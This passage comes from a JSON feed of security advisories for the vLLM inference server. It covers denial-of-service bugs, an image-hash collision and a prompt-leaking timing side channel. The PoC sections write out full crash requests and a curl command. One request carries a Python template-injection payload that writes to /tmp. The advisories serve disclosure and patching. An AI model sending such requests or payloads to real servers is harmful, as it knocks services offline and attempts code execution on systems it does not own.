resources.\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nType of vulnerability: Denial of Service (DoS)\n\n### Resolution\nUpgrade to a version of vLLM that includes appropriate HTTP limits by deafult, or use a proxy in front of vLLM which provides protection against this issue.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-08-21T14:24:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-rxc4-3w6r-4v47","https://github.com/vllm-project/vllm/pull/23267","https://github.com/vllm-project/vllm/commit/d8b736f913a59117803d6701521d2e4861701944","https://nvd.nist.gov/vuln/detail/CVE-2025-48956","https://github.com/advisories/GHSA-rxc4-3w6r-4v47","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2021.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-rxc4-3w6r-4v47","CVE-2025-48956"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-08-21T15:12:00.819Z","updated_at":"2026-10-02T15:07:06.824Z","epss_percentage":0.0056,"epss_percentile":0.44537,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yeGM0LTN3NnItNHY0N84ABLTs","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yeGM0LTN3NnItNHY0N84ABLTs","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.10.1.1","vulnerable_version_range":"\u003e= 0.1.0, \u003c 0.10.1.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yeGM0LTN3NnItNHY0N84ABLTs/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cnEzLXI4NzktN202Nc4ABIcm","url":"https://github.com/advisories/GHSA-vrq3-r879-7m65","title":"vLLM Tool Schema allows DoS via Malformed pattern and type Fields","description":"### Summary\nThe vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the \"pattern\" and \"type\" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. \n\n### Details\nThe \"type\" field is expected to be one of: \"string\", \"number\", \"object\", \"boolean\", \"array\", or \"null\". Supplying any other value will cause the worker to crash with the following error:\n\nRuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type \"something_or_nothing\"\n\nThe \"pattern\" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.\n\nFor example, the following inputs will crash the worker:\n\nUnclosed {, [, or (\n\nClosed:{} and []\n\nHere are some of runtime errors on the crash depending on what gets injected:\n\nRuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.\nRuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.\nRuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.\n\n### PoC\nHere is the POST request using the type field to crash the worker. Note the type field is set to \"something\" rather than the expected types it is looking for:\nPOST /v1/chat/completions HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \nContent-Type: application/json\nContent-Length: 579\nOrigin: \nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\nConnection: keep-alive\n\n{\n  \"model\": \"mistral-nemo-instruct\",\n  \"messages\": [{ \"role\": \"user\", \"content\": \"crash via type\" }],\n  \"tools\": [\n    {\n      \"type\": \"function\",\n      \"function\": {\n        \"name\": \"crash01\",\n        \"parameters\": {\n          \"type\": \"object\",\n          \"properties\": {\n            \"a\": {\n              \"type\": \"something\"\n            }\n          }\n        }\n      }\n    }\n  ],\n  \"tool_choice\": {\n    \"type\": \"function\",\n    \"function\": {\n      \"name\": \"crash01\",\n      \"arguments\": { \"a\": \"test\" }\n    }\n  },\n  \"stream\": false,\n  \"max_tokens\": 1\n}\n\nHere is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.\n\nPOST /v1/chat/completions HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: \nContent-Type: application/json\nContent-Length: 718\nOrigin: \nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\nTe: trailers\nConnection: keep-alive\n\n{\n  \"model\": \"mistral-nemo-instruct\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": \"Crash via Pattern\"\n    }\n  ],\n  \"tools\": [\n    {\n      \"type\": \"function\",\n      \"function\": {\n        \"name\": \"crash02\",\n        \"parameters\": {\n          \"type\": \"object\",\n          \"properties\": {\n            \"a\": {\n              \"type\": \"string\",\n\"pattern\": \"{{ __import__('os').system('echo RCE_OK \u003e /tmp/pwned') or 'SAFE' }}\"\n            }\n          }\n        }\n      }\n    }\n  ],\n  \"tool_choice\": {\n    \"type\": \"function\",\n    \"function\": {\n      \"name\": \"crash02\"\n    }\n  },\n  \"stream\": false,\n  \"max_tokens\": 32,\n  \"temperature\": 0.2,\n  \"top_p\": 1,\n  \"n\": 1\n}\n\n### Impact\nBackend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests. \n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/17623","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-05-28T19:42:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-vrq3-r879-7m65","https://github.com/vllm-project/vllm/pull/17623","https://nvd.nist.gov/vuln/detail/CVE-2025-48944","https://github.com/advisories/GHSA-vrq3-r879-7m65","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2023.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-vrq3-r879-7m65","CVE-2025-48944"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T20:07:59.876Z","updated_at":"2026-10-04T01:06:12.717Z","epss_percentage":0.00529,"epss_percentile":0.4276,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cnEzLXI4NzktN202Nc4ABIcm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cnEzLXI4NzktN202Nc4ABIcm","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cnEzLXI4NzktN202Nc4ABIcm/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05aGNmLXY3bTQtNm0yas4ABIcl","url":"https://github.com/advisories/GHSA-9hcf-v7m4-6m2j","title":"vLLM allows clients to crash the openai server with invalid regex","description":"### Impact\n\nA denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to [GHSA-6qc9-v4r8-22xg](https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg), but for regex instead of a JSON schema.\n\nIssue with more details: https://github.com/vllm-project/vllm/issues/17313\n\n### Patches\n\n* https://github.com/vllm-project/vllm/pull/17623","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-05-28T19:42:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-9hcf-v7m4-6m2j","https://github.com/vllm-project/vllm/issues/17313","https://github.com/vllm-project/vllm/pull/17623","https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff","https://nvd.nist.gov/vuln/detail/CVE-2025-48943","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-55.yaml","https://github.com/advisories/GHSA-9hcf-v7m4-6m2j"],"source_kind":"github","identifiers":["GHSA-9hcf-v7m4-6m2j","CVE-2025-48943"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T20:07:59.916Z","updated_at":"2026-10-04T01:06:12.717Z","epss_percentage":0.00487,"epss_percentile":0.39736,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05aGNmLXY3bTQtNm0yas4ABIcl","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05aGNmLXY3bTQtNm0yas4ABIcl","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05aGNmLXY3bTQtNm0yas4ABIcl/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cWM5LXY0cjgtMjJ4Z84ABIck","url":"https://github.com/advisories/GHSA-6qc9-v4r8-22xg","title":"vLLM DOS: Remotely kill vllm over http with invalid JSON schema","description":"### Summary\nHitting the  /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server\n\n\n### Details\nThe following API call \n`(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H \"Content-Type: application/json\" -d '{\"model\": \"meta-llama/Llama-3.2-3B-Instruct\",\"prompt\": \"Name two great reasons to visit Sligo \", \"max_tokens\": 10, \"temperature\": 0.5, \"guided_json\":\"{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}\"}'   \n`\nwill provoke a Uncaught exceptions from xgrammer in \n`./lib64/python3.11/site-packages/xgrammar/compiler.py\n`\n\nIssue with more information: https://github.com/vllm-project/vllm/issues/17248\n\n### PoC\nMake a call to vllm with invalid json_scema e.g. `{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}`\n\n`curl -s http://localhost:8000/v1/completions -H \"Content-Type: application/json\" -d '{\"model\": \"meta-llama/Llama-3.2-3B-Instruct\",\"prompt\": \"Name two great reasons to visit Sligo \", \"max_tokens\": 10, \"temperature\": 0.5, \"guided_json\":\"{\\\"properties\\\":{\\\"reason\\\":{\\\"type\\\": \\\"stsring\\\"}}}\"}'\n`\n### Impact\nvllm crashes\n\n\nexample traceback\n```\nERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 333, in run_engine_core\nERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 367, in run_busy_loop\nERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()\nERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/engine/core.py\", line 181, in step\nERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()\nERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py\", line 257, in schedule\nERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:\nERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py\", line 41, in grammar\nERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()\nERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py\", line 29, in _check_grammar_completion\nERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)\nERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/usr/lib64/python3.11/concurrent/futures/_base.py\", line 456, in result\nERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()\nERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/usr/lib64/python3.11/concurrent/futures/_base.py\", line 401, in __get_result\nERROR 03-26 17:25:01 [core.py:340]     raise self._exception\nERROR 03-26 17:25:01 [core.py:340]   File \"/usr/lib64/python3.11/concurrent/futures/thread.py\", line 58, in run\nERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)\nERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py\", line 120, in _async_create_grammar\nERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,\nERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nERROR 03-26 17:25:01 [core.py:340]   File \"/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py\", line 101, in compile_json_schema\nERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(\nERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is\u003cpicojson::object\u003e()) is false: Schema should be an object or bool\nERROR 03-26 17:25:01 [core.py:340] \nERROR 03-26 17:25:01 [core.py:340] \nCRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.\n```\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/17623","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-05-28T19:41:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg","https://github.com/vllm-project/vllm/issues/17248","https://github.com/vllm-project/vllm/pull/17623","https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff","https://nvd.nist.gov/vuln/detail/CVE-2025-48942","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-54.yaml","https://github.com/advisories/GHSA-6qc9-v4r8-22xg"],"source_kind":"github","identifiers":["GHSA-6qc9-v4r8-22xg","CVE-2025-48942"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T20:07:59.943Z","updated_at":"2026-10-04T01:06:12.717Z","epss_percentage":0.00551,"epss_percentile":0.44125,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cWM5LXY0cjgtMjJ4Z84ABIck","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cWM5LXY0cjgtMjJ4Z84ABIck","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.8.0, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cWM5LXY0cjgtMjJ4Z84ABIck/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jNjVwLXg2NzctZmdqNs4ABIby","url":"https://github.com/advisories/GHSA-c65p-x677-fgj6","title":"vLLM has a Weakness in MultiModalHasher Image Hashing Implementation","description":"## Summary\n\nIn the file `vllm/multimodal/hasher.py`, the `MultiModalHasher` class has a security and data integrity issue in its image hashing method. Currently, it serializes `PIL.Image.Image` objects using only `obj.tobytes()`, which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.\n\n## Details\n\n- **Affected file:** `vllm/multimodal/hasher.py`\n- **Affected method:** `MultiModalHasher.serialize_item`\nhttps://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35\n- **Current behavior:** For `Image.Image` instances, only `obj.tobytes()` is used for hashing.\n- **Problem description:** `obj.tobytes()` does not include the image’s width, height, or mode metadata.\n- **Impact:** Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:\n    - Incorrect cache hits, leading to abnormal responses\n    - Deliberate construction of images with different meanings but the same hash value\n\n\n## Recommendation\n\nIn the `serialize_item` method, **serialization of `Image.Image` objects should include not only pixel data, but also all critical metadata**—such as dimensions (`size`), color mode (`mode`), format, and especially the `info` dictionary. The `info` dictionary is particularly important in palette-based images (e.g., mode `'P'`), where the palette itself is stored in `info`. Ignoring `info` can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.\n\n**Summary:**  \nSerializing only the raw pixel data is insecure. Always include all image metadata (`size`, `mode`, `format`, `info`) in the hash calculation to prevent collisions, especially in cases like palette-based images.\n\n**Impact for other modalities**\nFor the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.\n\nFor audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.\n\n## Fixes\n\n* https://github.com/vllm-project/vllm/pull/17378","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-05-28T18:03:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.2,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-c65p-x677-fgj6","https://github.com/vllm-project/vllm/pull/17378","https://github.com/vllm-project/vllm/commit/99404f53c72965b41558aceb1bc2380875f5d848","https://nvd.nist.gov/vuln/detail/CVE-2025-46722","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-43.yaml","https://github.com/advisories/GHSA-c65p-x677-fgj6"],"source_kind":"github","identifiers":["GHSA-c65p-x677-fgj6","CVE-2025-46722"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T19:08:07.911Z","updated_at":"2026-10-03T14:06:26.784Z","epss_percentage":0.00324,"epss_percentile":0.23162,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jNjVwLXg2NzctZmdqNs4ABIby","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jNjVwLXg2NzctZmdqNs4ABIby","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.7.0, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jNjVwLXg2NzctZmdqNs4ABIby/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00cWpoLTlmdjktcjg1cs4ABIbx","url":"https://github.com/advisories/GHSA-4qjh-9fv9-r85r","title":"Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching","description":"This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.\n\n## Description\nWhen a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.\n\nFor instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.\n\nUnlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.\n\n## Environment\n\n- GPU: NVIDIA A100 (40G)\n- CUDA: 11.8\n- PyTorch: 2.3.1\n- OS: Ubuntu 18.04\n- vLLM: v0.5.1\nConfiguration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.\n\n## Leakage\nWe conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.\n\u003cimg src=\"https://github.com/user-attachments/assets/db3491e9-02b7-424c-9b6d-56f553b39f2f\" alt=\"roc_curves_combined_block_2\" width=\"400\"/\u003e\n\n\n## Results\nIn our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:\n- With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.\n- When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.\n\n## Fixes\n\n* https://github.com/vllm-project/vllm/pull/17045","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-05-28T18:02:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":2.6,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r","https://github.com/vllm-project/vllm/pull/17045","https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f","https://nvd.nist.gov/vuln/detail/CVE-2025-46570","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-53.yaml","https://github.com/advisories/GHSA-4qjh-9fv9-r85r"],"source_kind":"github","identifiers":["GHSA-4qjh-9fv9-r85r","CVE-2025-46570"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T19:08:07.951Z","updated_at":"2026-10-03T14:06:26.784Z","epss_percentage":0.003,"epss_percentile":0.2062,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cWpoLTlmdjktcjg1cs4ABIbx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00cWpoLTlmdjktcjg1cs4ABIbx","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cWpoLTlmdjktcjg1cs4ABIbx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qODI4LTI4cmotaGZocM4ABIbw","url":"https://github.com/advisories/GHSA-j828-28rj-hfhp","title":"vLLM vulnerable to Regular Expression Denial of Service","description":"### Summary\nA recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.\n\n#### 1. vllm/lora/utils.py [Line 173](https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173)\n\nhttps://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173\n**Risk Description:**\n- The regex `r\"\\((.*?)\\)\\$?$\"` matches content inside parentheses. If input such as `((((a|)+)+)+)` is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.\n- Using `.*?` (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.\n\n**Remediation Suggestions:**\n- Limit the input string length.\n- Use a non-recursive matching approach, or write a regex with stricter content constraints.\n- Consider using possessive quantifiers or atomic groups (not supported in Python yet), or split and process before regex matching.\n\n---\n\n#### 2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py [Line 52](https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52)\n\nhttps://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52\n\n**Risk Description:**\n- The regex `r'functools\\[(.*?)\\]'` uses `.*?` to match content inside brackets, together with `re.DOTALL`. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.\n\n**Remediation Suggestions:**\n- Limit the length of `model_output`.\n- Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).\n- Prefer `re.finditer()` and enforce a length constraint on each match.\n\n---\n\n#### 3. vllm/entrypoints/openai/serving_chat.py [Line 351](https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351)\n\nhttps://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351\n\n**Risk Description:**\n- The regex `r'.*\"parameters\":\\s*(.*)'` can trigger backtracking if `current_text` is very long and contains repeated structures.\n- Especially when processing strings from unknown sources, `.*` matching any content is high risk.\n\n**Remediation Suggestions:**\n- Use a more specific pattern (e.g., via JSON parsing).\n- Impose limits on `current_text` length.\n- Avoid using `.*` to capture large blocks of text; prefer structured parsing when possible.\n\n---\n\n#### 4. benchmarks/benchmark_serving_structured_output.py [Line 650](https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650)\n\nhttps://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650\n\n**Risk Description:**\n- The regex `r'\\{.*\\}'` is used to extract JSON inside curly braces. If the `actual` string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.\n- Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.\n\n**Remediation Suggestions:**\n- Limit the length of `actual`.\n- Prefer stepwise search for `{` and `}` or use a robust JSON extraction tool.\n- Recommend first locating the range with simple string search, then applying regex.\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/18454\n\n---","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-05-28T17:50:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-j828-28rj-hfhp","https://github.com/vllm-project/vllm/pull/18454","https://github.com/vllm-project/vllm/commit/4fc1bf813ad80172c1db31264beaef7d93fe0601","https://github.com/advisories/GHSA-j828-28rj-hfhp"],"source_kind":"github","identifiers":["GHSA-j828-28rj-hfhp"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-05-28T18:08:00.019Z","updated_at":"2026-09-23T15:09:05.148Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qODI4LTI4cmotaGZocM4ABIbw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qODI4LTI4cmotaGZocM4ABIbw","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.6.3, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qODI4LTI4cmotaGZocM4ABIbw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13NnE3LWo2NDItN2MyNc4ABIbv","url":"https://github.com/advisories/GHSA-w6q7-j642-7c25","title":"vLLM has a Regular Expression Denial of Service (ReDoS, Exponential Complexity) Vulnerability in 